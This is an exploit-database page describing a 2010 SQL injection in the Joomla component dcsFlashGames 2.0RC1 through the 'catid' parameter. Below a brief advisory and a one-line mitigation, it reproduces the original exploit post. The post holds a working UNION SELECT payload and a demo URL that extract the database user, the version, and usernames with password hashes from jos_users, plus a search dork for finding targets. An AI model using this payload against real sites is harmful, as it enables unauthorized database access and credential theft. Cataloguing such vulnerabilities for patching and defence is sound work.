header-logo
Suggest Exploit
vendor:
dcsFlashGames
by:
kaMtiEz
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: dcsFlashGames
Affected Version From: 2.0RC1
Affected Version To: 2.0RC1
Patch Exists: No
Related CWE: N/A
CPE: a:ekith:dcsflashgames
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component dcsFlashGames SQL Vulnerability ( catid )

A SQL injection vulnerability exists in Joomla Component dcsFlashGames, which allows an attacker to execute arbitrary SQL commands via the 'catid' parameter in a 'index.php' request. This vulnerability affects version 2.0RC1 and prior versions.

Mitigation:

Ensure that user-supplied input is validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

[!]===========================================================================[!]

[~] Joomla Component dcsFlashGames SQL Vulnerability ( catid )
[~] Author	: kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage	: http://www.indonesiancoder.com
[~] Date	: 25 March, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://ekith.com/
[+] Description : http://ext.joom.ru/dcsflashgames.html
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://joomlacode.org/gf/project/sageth/frs/
[+] Version : 2.0RC1

[!]===========================================================================[!]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_dcs_flashgames&Itemid=kaMtiEz&catid=[INDONESIANCODER]

[ XpL ]

666+union+all+select+1,2,user(),4,@@version,6,concat_ws(0x3a,username,password)+from+jos_users--


[ d3m0 ]

http://server/index.php?option=com_dcs_flashgames&Itemid=61&catid=51+union+all+select+1,2,user(),4,@@version,6,concat_ws(0x3a,username,password)+from+jos_users--


etc etc etc ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM MainHack ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW
[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31


[ NOTE ] 

[+] Babe enyak adek i love u pull dah .. 
[+] Jika kami bersama Nyalakan Tanda Bahaya ;)
[+] Ayy : lup u :">

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..

Navigation

Suggest Exploit

Services By CQR